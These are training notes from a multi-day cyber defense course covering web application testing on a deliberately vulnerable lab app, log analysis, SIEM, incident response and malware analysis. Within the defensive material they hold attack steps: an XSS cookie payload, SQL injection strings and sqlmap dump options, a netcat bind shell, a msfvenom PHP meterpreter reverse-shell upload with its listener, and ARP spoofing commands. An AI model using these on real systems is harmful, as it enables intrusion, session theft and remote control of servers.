Advanced Cyber Defense Training Course

02-13 September 2019


Instructor: Alper Basaran (Turkey)

Day 1: 02 September 2019; Web Application Security (1)

- Introduction:

NATO SPS programme: Science for Peace and Security

TUBITAK BILGEM: Cyber Security Institute / lab of the Turkish research council

www.bilgem.tubitak.gov.tr

- TRL: Technology Readiness Level

- Pardus: Turkish Linux distribution.

- Attack vectors for a client: USB / web / mail

- Attack vectors for a server: the services it runs (every exposed network service is an entry point)

- Scan types: manual, automated, hybrid

Tools: ZAP, WebScarab, w3af

ZAP: the OWASP Zed Attack Proxy (ZAP) is one of the world's most popular free security tools and is
actively maintained by hundreds of international volunteers. It can help you automatically find security
vulnerabilities in your web applications while you are developing and testing them. It is also a
great tool for experienced pentesters to use for manual security testing (intercepting proxy, spider, active scanner).

- Web app security lab: DVWA (Damn Vulnerable Web Application; default login admin/password, security level "low"): a deliberately vulnerable web application for practising attacks.

- Burp Suite (local intercepting proxy)

- CAs you should block (remove from the trust store): DarkMatter, UAE Global, QuoVadis

- Netcraft: DNS / hosting lookup for a site

Black box testing: no prior information except the target IP address / URL

White box testing: source code, usernames and passwords are provided

Grey box testing: combines the two previous approaches: partial knowledge, testing both the functionality and
the internals of a website.

OWASP / CWE

CWE (Common Weakness Enumeration, maintained by MITRE, not by OWASP) is a community-developed list of common
software security weaknesses. It serves as a common language, a measuring stick for software security tools,
and a baseline for weakness identification, mitigation, and prevention efforts.

OSINT (Open Source Intelligence)

* Google operators:

site: ...  -site: ...

inurl: ...

filetype: ...

intext: ...

* Google Hacking Database / Netcraft / Shodan: passive reconnaissance; the target receives no traffic from the analyst, so the user is not revealed as an attacker

- Scanning a site:

fierce -dns <domain> : DNS enumeration (subdomains, zone transfer attempts)

nikto -h <ip or URL> : scan for web server misconfigurations

nikto -h "http://www.defense.tn"

nmap -sS <ip> : SYN scan (SYN / SYN-ACK / RST; the handshake is never completed)

nmap -sV -p- <ip> : service version detection on all 65535 TCP ports

Input/Output Validation

- SOP: the Same-Origin Policy is the core concept of the browser security model: a script from one origin (scheme + host + port) cannot read data belonging to another origin

- Block list / allow list (prefer an allow list of what the input may contain)

- Cross-Site Scripting (XSS) attack:

* Reflected XSS:

a/ Two conditions must hold:

1- The input sent to the server is reflected back in the response (it appears in the page source)

2- The input is not filtered or encoded, so characters such as < > " ' survive (the form "accepts wild cards")

b/ XSS is a threat to the client (the browser), not to the server

* Stored XSS (the payload is saved by the application, e.g. in a comment or profile field, and served to every visitor)

Example payload (pops up the session cookie; a real attack sends it to the attacker's server instead):
<script> alert(document.cookie)</script>

python -m SimpleHTTPServer 8888 : start a local web server on that port (Python 2; with Python 3 use python3 -m http.server 8888), e.g. to receive a stolen cookie in its access log
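To make the two reflected-XSS conditions concrete, here is an added example (not code from the course or from DVWA): a hypothetical Python search page that reflects the query once verbatim and once HTML-encoded, the check a scanner such as ZAP or Burp performs to tell the two apart, and a small stored-XSS variant showing that data read back from storage needs exactly the same output encoding. The function names and page markup are assumptions for the example.

```python
import html

# The payload from the notes
PAYLOAD = "<script>alert(document.cookie)</script>"


def render_search_vulnerable(query):
    """Reflected XSS: the server's reply contains the input (condition 1) and
    nothing filters or encodes it (condition 2), so the browser executes it."""
    return f"<html><body><p>Results for: {query}</p></body></html>"


def render_search_safe(query):
    """Same page with output encoding: < > & " ' become entities, so the input
    is still reflected but can only ever be rendered as text."""
    return f"<html><body><p>Results for: {html.escape(query, quote=True)}</p></body></html>"


def render_guestbook(comments, escape):
    """Stored XSS: comments come from the application's storage instead of the
    current request, but the rendering mistake (and its fix) is identical."""
    items = [html.escape(c, quote=True) if escape else c for c in comments]
    return "<ul>" + "".join(f"<li>{c}</li>" for c in items) + "</ul>"


def is_reflected_unescaped(page, probe):
    """What a scanner checks after injecting a probe: does it come back byte for byte?"""
    return probe in page


if __name__ == "__main__":
    for renderer in (render_search_vulnerable, render_search_safe):
        page = renderer(PAYLOAD)
        print(renderer.__name__, "reflects the payload unescaped:",
              is_reflected_unescaped(page, PAYLOAD))
    print(render_guestbook(["hello", PAYLOAD], escape=True))
```

The encoding must match the context the value lands in: html.escape is right for text between tags and for quoted attribute values, but a value placed inside a <script> block or a URL needs JavaScript or URL encoding instead.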

Technologies and Standards

URL, URI, URN

The Document Object Model (DOM) is a programming interface for HTML and XML documents. It represents the
page so that programs can change the document structure, style, and content. The DOM represents the document as
nodes and objects; that is how scripting languages connect to the page.

A CGI script (Common Gateway Interface) is a program the web server runs to generate a response.

HTTP methods:

GET, POST, PUT, DELETE, TRACE, OPTIONS, PATCH

End of The day.


Day 2: 03 September 2019; Web Application Security (2)

Terraform (infrastructure as code) is used by the cyber lab to build the cloud / virtual environment.

OWASP: Open Web Application Security Project

- SQL injection: try these payloads (MySQL syntax; # starts a comment that swallows the rest of the original query)

' or 1=1

' or 1=1 union select null, version()#

' or 1=1 union select null, user()#

(the union select must have the same number of columns as the original query; null fits any column type)

# sqlmap -u "<URL>" --cookie="<cookie value>"

Cookie value: the session cookie of the logged-in user (e.g. the PHPSESSID of a PHP application), which is what <script> alert(document.cookie)</script> displays

sqlmap command line options:

# --dbs: enumerate the databases

# -a: enumerate everything it can find

# -D: select a database

# -T: select a table

# --tables: list the tables of the selected database

# --dump: dump the table entries
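The payloads above, run against a query built by string concatenation and against the same query with a bound parameter. This is an added example, not code from the course: it uses Python's built-in sqlite3 module so it runs offline, so sqlite_version() stands in for MySQL's version() and the comment marker is -- instead of #. The users table and its two rows are constructed for the example.

```python
import sqlite3


def make_demo_db():
    """Constructed table with two users; nothing else in the database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (id, name) VALUES (?, ?)",
                     [(1, "alice"), (2, "bob")])
    conn.commit()
    return conn


def lookup_user_vulnerable(conn, name):
    """The input is pasted into the statement: the quote in the payload closes
    the string literal and everything after it is executed as SQL."""
    sql = f"SELECT id, name FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_user_safe(conn, name):
    """Parameterised: the value travels separately from the statement and can
    never change its structure, whatever it contains."""
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()


# The course payloads, adapted to SQLite syntax
PAYLOAD_TAUTOLOGY = "' OR 1=1--"
PAYLOAD_VERSION = "' OR 1=1 UNION SELECT NULL, sqlite_version()--"


if __name__ == "__main__":
    conn = make_demo_db()
    print("vulnerable, tautology:", lookup_user_vulnerable(conn, PAYLOAD_TAUTOLOGY))
    print("vulnerable, union:    ", lookup_user_vulnerable(conn, PAYLOAD_VERSION))
    print("safe, union:          ", lookup_user_safe(conn, PAYLOAD_VERSION))
```

The union payload only works because it selects exactly two columns, like the original query; with the wrong count the database returns an error, which is the signal sqlmap uses to find the right number.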

- Web application firewall detection tool: wafw00f

wpscan --url <wordpress site>

nc -v -l -p 31337 -e /bin/bash : (on the target) listen on that port and hand the connection a bash shell (bind shell; -e needs a netcat build that supports it)

nc -nv <ip> 31337 : (from the attacker) connect to that port

- pentestmonkey.net (reverse shell cheat sheet and scripts)

- Reverse shell execution

Steps

1- Upload the file to the server (through a file upload vulnerability, e.g. DVWA's upload page)

2- Call / execute it

3- Prepare the script (payload with msfvenom)

4- Open the listener

* Details:

- Listener using netcat

# nc -nlvp 1234

- Using Meterpreter:
Prepare the script

msfvenom -p php/meterpreter/reverse_tcp LHOST=<kali ip> LPORT=<chosen port> -f raw > shell.php

- Use msf:

# msfconsole

msf> use exploit/multi/handler

msf> set PAYLOAD php/meterpreter/reverse_tcp

msf> set LHOST <kali ip>

msf> set LPORT <chosen port>

msf> exploit

Then do steps 1 to 3 (the listener must already be running when the uploaded file is called, otherwise the connection back is lost)

- Authentication:

* Three factors:

1- Something you know (username, password)

2- Something you have (token, smart card)

3- Something you are (fingerprint, other biometrics)

OTP: one-time password

Brute force attack:

- Use Burp Suite

- Action: send the request to Intruder

- Mark the input position(s) the attack will vary

- Prepare a customised wordlist

- Start the attack

howsecureismypassword.com : estimates password strength (never type a real password into a third-party site; test with throwaway examples)


Day 3: 04 September 2019; Log Analysis (1)

Log Analysis

- Monitoring / traffic analysis

- Incident response

- Threat intelligence

- Forensics

- Malware analysis

TTP: Tactics, Techniques and Procedures: how the attacker operates

IOC: Indicator of Compromise (registry key, C&C IP address, file hash, ...)

HTTP status codes:

- 1xx: informational

- 2xx: success

- 3xx: redirection

- 4xx: client error

- 5xx: server error

MITRE ATT&CK project

NIST penetration testing guidance

Web log analysis:

1- Find the sqlmap attack (sqlmap announces itself in the User-Agent unless it is run with --random-agent):

# cat logfile | grep sqlmap | cut -d " " -f 1 | sort | uniq > file

2- Resolve the IP addresses

# for i in $(cat file); do host $i; done

3- Whois

# for i in $(cat file); do whois $i; done

Check the addresses on VirusTotal

4- Find what else the attacker did:

# cat logfile | grep <ip> | grep -v sqlmap ...

Check the attacked software for known vulnerabilities: cvedetails.com

Other log analysis tools / topics:

- Network access control: PacketFence

- ARP poisoning
- DHCP starvation attack

- DoS / DDoS:

* Slowloris: DoS that exhausts the web server's connection slots (its configured client limit) by holding many partial HTTP requests open; it needs almost no bandwidth

* Slowloris check with the nmap script:

locate *.nse | grep slowloris

- Phishing test: GoPhish


Day 4: 05 September 2019; Log Analysis (2)

* Log analysis (day 2):

- list/count error log entries for non-existent files (typical of scanners such as nikto):

cat error.log | grep "File does not exist:" | wc -l

- list/count the usernames tried in a brute force attack (field 10 depends on the error log format):

cat error.log | grep -v File | grep "user" | cut -d " " -f 10 | sort | uniq -c | sort -n

- list/count error log entries for directory traversal (plain ../ and URL-encoded %2E%2E, any case):

cat error.log | grep -E -i '\.\./|%2e%2e'
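The Day 3 access-log pivot (sqlmap source addresses, then "what else did that address do") and the Day 4 error-log counts above, as one added Python example that is not code from the course. The Apache combined access log and 2.2-style error log lines are constructed for the example; the functions mirror the shell pipelines but parse fields by name, so a path that happens to contain "sqlmap", or a different field position, does not skew the result.

```python
import re
from collections import Counter

# Constructed Apache "combined" access log lines (not the course's log file)
ACCESS_LOG = """\
203.0.113.7 - - [05/Sep/2019:10:01:02 +0100] "GET /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Sep/2019:10:01:09 +0100] "GET /vulnerabilities/sqli/?id=1%27%20AND%201=1 HTTP/1.1" 200 4201 "-" "sqlmap/1.3.8#stable (http://sqlmap.org)"
203.0.113.7 - - [05/Sep/2019:10:01:09 +0100] "GET /vulnerabilities/sqli/?id=1%27%20AND%201=2 HTTP/1.1" 200 4012 "-" "sqlmap/1.3.8#stable (http://sqlmap.org)"
198.51.100.23 - - [05/Sep/2019:10:02:30 +0100] "GET /index.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Sep/2019:10:05:41 +0100] "POST /vulnerabilities/upload/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Sep/2019:10:05:50 +0100] "GET /hackable/uploads/shell.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.0.2.9 - - [05/Sep/2019:10:07:00 +0100] "GET /admin/ HTTP/1.1" 404 210 "-" "sqlmap/1.3.8#stable (http://sqlmap.org)"
"""

# Constructed Apache 2.2-style error log lines
ERROR_LOG = """\
[Thu Sep 05 10:07:00 2019] [error] [client 192.0.2.9] File does not exist: /var/www/html/admin
[Thu Sep 05 10:08:11 2019] [error] [client 198.51.100.23] user admin not found: /private
[Thu Sep 05 10:08:12 2019] [error] [client 198.51.100.23] user admin: authentication failure for "/private": Password Mismatch
[Thu Sep 05 10:08:13 2019] [error] [client 198.51.100.23] user root not found: /private
[Thu Sep 05 10:08:20 2019] [error] [client 192.0.2.9] File does not exist: /var/www/html/../../etc/passwd
[Thu Sep 05 10:08:21 2019] [error] [client 192.0.2.9] File does not exist: /var/www/html/%2E%2E/%2E%2E/etc/shadow
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
ERROR_RE = re.compile(r"^\[(?P<time>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[^\]\s]+)\] (?P<msg>.*)$")
USER_RE = re.compile(r"^user (\S+?)[: ]")
# ../ or ..\ in clear, or URL-encoded %2e%2e in either case
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|%2e%2e", re.IGNORECASE)


def parse_access(log):
    return [m.groupdict() for m in map(ACCESS_RE.match, log.splitlines()) if m]


def parse_error(log):
    return [m.groupdict() for m in map(ERROR_RE.match, log.splitlines()) if m]


def sqlmap_source_ips(log):
    """grep sqlmap | cut -d ' ' -f 1 | sort | uniq, matching on the User-Agent field."""
    return sorted({r["ip"] for r in parse_access(log) if "sqlmap" in r["ua"].lower()})


def other_requests_from(log, ip):
    """What else did that address do? grep <ip> | grep -v sqlmap, in log order."""
    return [(r["method"], r["path"], r["status"])
            for r in parse_access(log) if r["ip"] == ip and "sqlmap" not in r["ua"].lower()]


def count_missing_files(log):
    """grep 'File does not exist:' | wc -l"""
    return sum(1 for r in parse_error(log) if r["msg"].startswith("File does not exist:"))


def bruteforce_usernames(log):
    """Usernames seen in auth errors with their counts, most frequent first."""
    users = Counter()
    for r in parse_error(log):
        m = USER_RE.match(r["msg"])
        if m:
            users[m.group(1)] += 1
    return users.most_common()


def traversal_attempts(log):
    """(client ip, message) for every error containing a traversal sequence."""
    return [(r["ip"], r["msg"]) for r in parse_error(log) if TRAVERSAL_RE.search(r["msg"])]


if __name__ == "__main__":
    for ip in sqlmap_source_ips(ACCESS_LOG):
        print(ip, "->", other_requests_from(ACCESS_LOG, ip))
    print(count_missing_files(ERROR_LOG), bruteforce_usernames(ERROR_LOG), traversal_attempts(ERROR_LOG))
```

In the constructed data the pivot is what matters: 203.0.113.7 scanned with sqlmap, then came back with a normal browser User-Agent, uploaded a file and requested it, which is the web shell the Day 2 notes describe.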

* Network analysis:

- Strategy for incident response:

Check the first component that raised the alarm (AV / FW / server / ...)

It could be a false positive

- Packet capture and analysis

* Wireshark (graphical)

* tcpdump: command line sniffer and network analyser

-i : interface

-n : do not resolve names (no DNS lookups)

- IDS: Intrusion Detection System:

Software / hardware solution

Types:

* By location

Network-based IDS

Host-based IDS

* By detection method

Signature-based

Anomaly-based

* By packet processing

Stateful IDS

Stateless IDS

Snort IDS:
Free Snort rules: the Snort community ruleset, and the hestat repository on GitHub

Network services:

HTTP uses TCP

Services using UDP: DNS, VoIP, syslog

* VPN: Virtual Private Network

IPsec, PPP-based tunnels, ...

* Protocols the FW should deny from the Internet to the internal network: ICMP, RDP, rlogin, FTP, SMB, ...

* Protocols the FW should deny from the internal network to the Internet: ICMP, IPsec, DNS (except from the internal resolvers), HTTPS (except through the proxy), ...

Network flow data:

processing of the network flows exported by routers / switches

Tools and formats: NetFlow, sFlow, IPFIX, NfSen, NfDump, FlowBAT

DNS tunnel detection:

--/--/Brodsky-Darkhovsky (change-point detection on the query stream)

HTTP packet analysis:

Methods: GET, HEAD, PUT, POST, DELETE, TRACE, CONNECT, OPTIONS

The server should be configured to accept only the methods the application needs, normally GET and POST (TRACE in particular should be disabled)

Exercise:

1/ Trend in log_1

RPC scans

Snort alert: portmap mountd request UDP

cat snort-alerts.txt | cut -d: -f5-7 | grep '^ [0-9]' | sort | uniq -c | sort -n

* Badly formatted FW log file

* Check the UTM format of the FW log file

Check for dropped IPs

To exploit UTM logs well, you should:

- have an allow list for the FW

- do a rule review

- have egress rules

- use geo-location

2/ Trend in log_2

To check whether it is a botnet or not: if the attacker connects with the same fixed (TCP) source port every time,
it is a bot (a normal client picks a random ephemeral source port for each connection; a hard-coded port points to a tool).
Center for Internet Security (CIS) Benchmarks: best practices for the secure configuration of a
target OS or application.

cat honeynet-Feb1_FebXX.log | cut -d "=" -f15 | cut -d " " -f 1 | sort | uniq -c | sort -n

* search for the most used destination port

* or search by source port and filter on 4444 (Metasploit's default port)

cat honeynet-Feb1_FebXX.log | grep "SPT=4444"

The three types of testing are described here:

- Black box: the tester has no knowledge of the system and works the same way as an outside attacker.

- White box: the tester has significant knowledge of the system. This simulates an attack from an insider, a rogue employee.

- Gray box: a middle ground between the first two types of testing. The tester has some limited
knowledge of the target system.
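The honeynet exercise above, as an added Python example that is not code from the course: it parses iptables/UTM-style "KEY=value" firewall lines (the format the cut -d "=" and SPT=4444 commands imply), counts destination ports, pulls out every connection using a given source port, and applies the notes' fixed-source-port bot heuristic. The log lines are constructed; the field names SRC, DST, PROTO, SPT and DPT are the ones the Linux netfilter log uses.

```python
import re
from collections import Counter, defaultdict

# Constructed netfilter/UTM-style log lines, not the course's honeynet file
FW_LOG = """\
Feb  1 03:14:22 honeypot kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=10.0.0.5 PROTO=TCP SPT=4444 DPT=445 SYN
Feb  1 03:14:23 honeypot kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=10.0.0.6 PROTO=TCP SPT=4444 DPT=445 SYN
Feb  1 03:14:24 honeypot kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=10.0.0.7 PROTO=TCP SPT=4444 DPT=445 SYN
Feb  1 03:14:25 honeypot kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=10.0.0.7 PROTO=TCP SPT=4444 DPT=139 SYN
Feb  1 04:01:10 honeypot kernel: IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.0.5 PROTO=TCP SPT=51234 DPT=22 SYN
Feb  1 04:01:15 honeypot kernel: IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.0.5 PROTO=TCP SPT=51240 DPT=22 SYN
Feb  1 05:30:00 honeypot kernel: IN=eth0 OUT= SRC=192.0.2.9 DST=10.0.0.5 PROTO=TCP SPT=33001 DPT=445 SYN
Feb  1 05:30:01 honeypot kernel: IN=eth0 OUT= SRC=192.0.2.9 DST=10.0.0.6 PROTO=TCP SPT=33001 DPT=445 SYN
Feb  1 05:31:00 honeypot kernel: IN=eth0 OUT= SRC=192.0.2.9 DST=10.0.0.5 PROTO=UDP SPT=53 DPT=53
"""

KV_RE = re.compile(r"(\w+)=(\S*)")


def parse_kv(line):
    """'SRC=1.2.3.4 DST=... SPT=4444' -> dict; flags without '=' (SYN) are dropped."""
    return dict(KV_RE.findall(line))


def records(log):
    return [r for r in map(parse_kv, log.splitlines()) if "SRC" in r and "DPT" in r]


def top_destination_ports(log, n=5):
    """cut -d '=' -f15 | ... | sort | uniq -c | sort -n, by field name instead of position."""
    return Counter(int(r["DPT"]) for r in records(log)).most_common(n)


def connections_with_source_port(log, spt):
    """grep 'SPT=4444': (src, dst, dpt) for every record using that source port."""
    return [(r["SRC"], r["DST"], int(r["DPT"]))
            for r in records(log) if r.get("SPT") == str(spt)]


def fixed_source_port_sources(log, min_hits=3):
    """The notes' bot heuristic: a source that opened at least min_hits TCP
    connections, all from one and the same source port. Returns {src: port}."""
    ports_by_src = defaultdict(Counter)
    for r in records(log):
        if r.get("PROTO") == "TCP" and "SPT" in r:
            ports_by_src[r["SRC"]][int(r["SPT"])] += 1
    bots = {}
    for src, ports in ports_by_src.items():
        if len(ports) == 1:
            port, hits = next(iter(ports.items()))
            if hits >= min_hits:
                bots[src] = port
    return bots


if __name__ == "__main__":
    print(top_destination_ports(FW_LOG))
    print(connections_with_source_port(FW_LOG, 4444))
    print(fixed_source_port_sources(FW_LOG, min_hits=2))
```

The min_hits threshold is what keeps the heuristic honest: two connections from the same port can be a coincidence, a dozen cannot, and the UDP record is ignored because DNS clients legitimately reuse port 53.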
Day 5: 06 September 2019; Log Analysis (3)

Antivirus log

Log file contents: alarms, updates, session events (user / admin)

Email log analysis

- Header analysis:

Never connect to the mail servers with admin credentials (they are in the DMZ and could be compromised)

Have a firewall rule restricting admin connections to the servers

Get a solution that checks the links in mail (when the mail arrives and/or each time a user clicks one)

Browser add-ons: Privacy Badger, Disconnect; sandbox: Sandboxie

Emkei's Mailer: fake mailer with attachments, encryption, HTML editor and advanced settings

Typosquatting (fake URL that looks like a well-known site's URL)

dnstwist report: domain name permutation service

Windows log analysis

https://www.fortinet.com/blog/threat-research.html

File analysis:

Automated (IOC, SIEM),

Semi-automated (log analysis),

Manual (by-hand memory analysis, allow-list hash lookup)

Never install any program on the affected machine after an incident (it overwrites evidence)

Data collection and analysis tools:

GRR: Google Rapid Response (open source)

Linux, Mac, Windows support

Registry, file system, memory and process analysis

Mandiant Redline (free)

Malware risk index,

Registry, file system, memory and process analysis

IOC: Indicator of Compromise (traces that point to an intrusion with high confidence)

Standards: OpenIOC, STIX, IETF

Steps:

1 Creating the IOC

2 IOC integration
3 Detection of suspicious hosts

4 Evidence collection

5 Data analysis

6 Go back to step 1

IOC Editor: to create, edit and integrate IOCs

IOC Finder: to search hosts for shared indicators

YARA rules (pattern-matching rules for identifying malware, not IPS rules): http://plusvic.github.io/yara

Windows Event Log

What? Where? When? How? Who? Why?

Some event ID examples

ID 1100: event logging service shut down (logged before the PC shuts down)

ID 1101: audit events dropped by the transport

ID 1102: audit log cleared

ID 4608: Windows starting up (PC start time)

ID 4609: Windows shutting down (usually absent because 1100 closes the log before it)

ID 4616: system time changed

ID 4946: firewall rule added

ID 4948: firewall rule deleted

Logon types (a field of the 4624 / 4625 logon events; the numbers below are the Windows values):

2- Interactive (the user is at the keyboard)

3- Network (e.g. SMB share access)

4- Batch (scheduled task)

5- Service

7- Unlock

8- NetworkCleartext (credentials sent in clear, e.g. basic authentication)

9- NewCredentials (runas /netonly)

10- RemoteInteractive (RDP)

11- CachedInteractive (cached domain credentials, no domain controller reachable)

* python-evtx: converts Windows .evtx log files to XML / text

- Linux logs:

* Places: /var/log, /var/log/messages, /var/log/syslog

* Syslog:
* Message format: timestamp, hostname, app-name, priority (facility and severity)

* www.sans.org: online cyber-security courses
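The event IDs and logon types above turned into triage logic, as an added Python example (not code from the course): the records are constructed dicts shaped like the EventID and EventData fields of Security.evtx once python-evtx has turned it into XML; the field names (TargetUserName, LogonType, IpAddress) are the real ones, and the internal address prefix and failed-logon threshold are assumptions for the example.

```python
from collections import Counter

# Logon type numbers as Windows defines them for the 4624/4625 events
LOGON_TYPES = {
    2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
    8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
    11: "CachedInteractive",
}

# Constructed records, not from a real machine
EVENTS = [
    {"EventID": 4608, "Time": "2019-09-05T07:58:01"},
    {"EventID": 4624, "Time": "2019-09-05T08:02:11", "TargetUserName": "dridi", "LogonType": 2, "IpAddress": "-"},
    {"EventID": 4624, "Time": "2019-09-05T08:30:45", "TargetUserName": "svc_backup", "LogonType": 8, "IpAddress": "10.0.0.44"},
    {"EventID": 4625, "Time": "2019-09-05T09:10:01", "TargetUserName": "Administrator", "LogonType": 3, "IpAddress": "203.0.113.7"},
    {"EventID": 4625, "Time": "2019-09-05T09:10:02", "TargetUserName": "Administrator", "LogonType": 3, "IpAddress": "203.0.113.7"},
    {"EventID": 4625, "Time": "2019-09-05T09:10:03", "TargetUserName": "Administrator", "LogonType": 3, "IpAddress": "203.0.113.7"},
    {"EventID": 4624, "Time": "2019-09-05T09:10:09", "TargetUserName": "Administrator", "LogonType": 10, "IpAddress": "203.0.113.7"},
    {"EventID": 4616, "Time": "2019-09-05T09:12:00"},
    {"EventID": 4946, "Time": "2019-09-05T09:13:30"},
    {"EventID": 1102, "Time": "2019-09-05T09:20:00"},
]

# Events that are a finding on their own (ids from the notes)
SINGLE_EVENT_RULES = {
    1100: ("info", "event logging service shut down"),
    1102: ("high", "audit log cleared"),
    4608: ("info", "system start"),
    4609: ("info", "system shutdown"),
    4616: ("medium", "system time changed"),
    4946: ("medium", "firewall rule added"),
    4948: ("medium", "firewall rule deleted"),
}


def logon_type_name(n):
    return LOGON_TYPES.get(n, f"Unknown({n})")


def triage(events, internal_prefix="10.0.0.", failed_threshold=3):
    """Return (severity, event_id, description, time) findings in log order,
    then one aggregated finding per (source, account) with repeated failures."""
    findings = []
    failed = Counter()
    for ev in events:
        eid, t = ev["EventID"], ev.get("Time", "")
        if eid in SINGLE_EVENT_RULES:
            sev, text = SINGLE_EVENT_RULES[eid]
            findings.append((sev, eid, text, t))
        elif eid == 4624:  # successful logon: look at how and from where
            lt, ip, user = ev["LogonType"], ev["IpAddress"], ev["TargetUserName"]
            name = logon_type_name(lt)
            if lt == 8:
                findings.append(("high", eid, f"{name} logon of {user}: credentials sent in clear from {ip}", t))
            elif lt == 10 and not ip.startswith(internal_prefix):
                findings.append(("high", eid, f"{name} (RDP) logon of {user} from external address {ip}", t))
        elif eid == 4625:  # failed logon: count per source and account
            failed[(ev["IpAddress"], ev["TargetUserName"])] += 1
    for (ip, user), n in failed.items():
        if n >= failed_threshold:
            findings.append(("high", 4625, f"{n} failed logons for {user} from {ip} (brute force?)", ""))
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

Read in time order, the constructed sample tells the story the notes want found: three failed logons then an RDP logon from an external address, a time change, a new firewall rule, and finally the audit log being cleared.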

Incident response checklist:

- What is the nature of the problem?

- How was the problem initially detected? When? By whom?

- Which security infrastructure components exist in the environment? (FW, AV, ...)

- Which individuals are aware of it?

- Who is the primary incident response coordinator? (tech lead, admin lead or legal lead)

- Who is authorised to make business decisions?

- Which mechanisms will be used to handle the incident?

- Which infrastructure is affected and what is its security posture?

- Have other security incidents been observed in the affected environment?

- What are the possible ingress and egress points?

- Which theories exist for how the initial compromise occurred?

- Which analysis actions are taken when qualifying the incident?

- Which commands or tools are used? (record every one!)

- Which measures will contain the scope of the incident?

Log analysis checklist:

- Identify the log files you can use

- Copy the log records to a single location

- Minimise "noise" by removing useless log entries

- Determine whether you can rely on the logs (could they have been tampered with?)

General approach:

- Focus on recent changes, failures, errors, access and admin events

- Reconstruct the actions before and after the incident

- Correlate between the different log sources

- Develop theories about what occurred; explore the logs to confirm or disprove them

Potential security log sources

- Server and workstation OS logs

- Application logs

- Security tool logs

- Outbound proxy
- Other non-log sources for security events (e.g. who visited which sites, ...)

What to look for on network devices

- Inbound/outbound activity

What to look for in events

- Detected attack activity

What to look for on web servers

- Failed access, error statuses

- Files accessed, types of files, ...


Day 6: 07 September 2019; SIEM

SIEM installation
Day 7: 09 September 2019; SIEM

TTP: Tactics, Techniques and Procedures

MITRE projects: https://attack.mitre.org/

SIEM rule resources: https://github.com/Neo23x0/sigma/tree/master/rules

Vulnerability scan tools:

Network            Web application
Nessus             Acunetix
Nexpose            Netsparker
OpenVAS (free)     VEGA (free)

* Wazuh / OSSEC (host-based, agent on each machine)

* Vulnerability check methods: with credentials (authenticated scan) / without credentials

* Vulnerability management programme (plan to keep the vulnerability database updated)

* Vulnerability scan steps:

- start the scans

- results

- review (check for false positives and false negatives)

- plan (how to correct them)

- start the corrections

- check that the corrections were completed successfully

- vulnerability threat intelligence

- do it again from the first step

Important tools/tasks to have in your network:

- patch update management tools

- third-party software inventory

- check for previous exploitation


Day 8: 10 September 2019 SIEM

* Collecting threat intelligence:

- Tactical intelligence

- Operational intelligence (who? why? how? : to build attacker profiles)

- Strategic intelligence (long term)

- Log shipping:

* Collect logs

* Centralise logs

Log prioritisation: low, medium, high (serious)

High-priority logs should be encrypted when stored

Log transport:

- Syslog over UDP (no delivery guarantee)

- Syslog over TCP (reliable delivery, still cleartext)

- Encrypted syslog (TLS)

- SOAP over HTTP

- SNMP

- Regular file transfer (FTPS or SCP)

OSSIM hands-on

* Linux sends logs to OSSIM:

- add the line *.* @<OSSIM ip>:514 to /etc/syslog.conf (or /etc/rsyslog.conf); a single @ means UDP, use @@ for TCP

* Windows sends logs to OSSIM:

- install the OSSEC agent and register it with the OSSEC agent manager

SIEM training: traffic analysis

* Packet analysis (.pcap)

* ARP cache poisoning (man-in-the-middle on the local segment; forwarding must be on or the victim loses connectivity):

# echo 1 > /proc/sys/net/ipv4/ip_forward

# arpspoof -i eth0 -t <victim ip> -r <gateway ip>

* Listening to traffic on the network:

# tcpdump -vv -i eth0 tcp port 80

# tcpdump -n -vv -i eth0 tcp port 80 : do not convert addresses to names

* Read a PCAP file with tcpdump:

# tcpdump -r capture.pcap

Or just open it with Wireshark

Exercises

Samples:

- File samples/wrongdissec.pcapng

* Wireshark does not know how to decode the packets, so it shows them as plain TCP.

* The port used is 1492 (Google says FTP)

* Change the decoding:

- right-click on the packet

- Decode As...

- change "current" to the correct protocol (FTP).

* Then Follow TCP Stream

Exercise 1: watering hole attack, drive-by download


Day 9: 11 September 2019;Malware Analysis

www.av-test.org : antivirus test results

Exercise 3:

We found something abnormal in the pcap files (an IP address, a URL and a malware download).

We use Google and VirusTotal to check them.

After that, the following steps let us check our own network with each security component:

Step       AV                                      IPS                                 FW
1st step   Nuclear EK (SWF/Flash exploit)          URL                                 malware IP
2nd step   check the antivirus                     check who else visited the URL      check whether other devices connected to the IP
3rd step   research the malware (what it does...)  check similar URLs                  check similar IPs (provider, same subnet, ...)

* The IPS cannot tell that one of its signatures is a false positive

* A notification could come from the IPS and the AV, but there is no notification from the FW

Monday checklist

- Vulnerability management

- Log management

- Traffic analysis

- Phishing test

- Penetration test

- Threat intelligence

What we have: FW / IPS / AV

What we need: SIEM, TAP "Terminal Access Point" (traffic capture)

Malware analysis

Techniques: basic / advanced, static / dynamic

Types of malware: backdoor, botnet, downloader, information-stealing malware, launcher, rootkit, scareware, spam-sending malware, worm, virus

After an incident we should prepare IOCs (Indicators of Compromise) to load into the SIEM

Static malware analysis steps to prepare the IOC (analysing the malware without running it):

1- Hash

# md5sum file

# sha256sum file
